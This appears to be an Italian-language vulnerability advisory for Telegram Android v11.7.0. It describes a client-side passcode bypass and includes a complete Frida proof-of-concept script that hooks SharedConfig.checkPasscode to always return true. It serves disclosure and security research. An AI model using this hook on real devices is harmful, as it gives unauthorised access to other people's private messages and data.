
Frida-based proof-of-concept che dimostra il bypass dell'autenticazione in Telegram Android agganciando SharedConfig.checkPasscode per restituire sempre true, consentendo l'accesso non autorizzato.
Un problema nella classe SharedConfig di Telegram Android APK v.11.7.0 consente a un attaccante fisicamente vicino di bypassare l'autenticazione e aumentare i privilegi manipolando il valore restituito dal metodo checkPasscode.
Bypass dell'autenticazione
Telegram
Telegram android apk v.11.7.0
org.telegram.messenger.SharedConfig
Java.perform(function() {
// Locate the SharedConfig class in the target application
var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');
// Hook the checkPasscode method to modify its behavior
PassCodeActivity.checkPasscode.implementation = function(passcode) {
// Bypass the actual passcode check by always returning true
return true;
};
});
https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing
Questa vulnerabilità è un problema di bypass dell'autenticazione lato client. Colpisce gli utenti che si affidano alla funzionalità del passcode per proteggere dati sensibili o limitare l'accesso a funzionalità specifiche dell'app. Sfruttando questa falla, un attaccante fisicamente vicino può manipolare il processo di verifica del passcode, bypassare l'autenticazione e ottenere accesso non autorizzato ad aree protette dell'app. Ciò potrebbe portare all'esposizione di dati sensibili dell'utente o ad azioni non autorizzate all'interno dell'applicazione.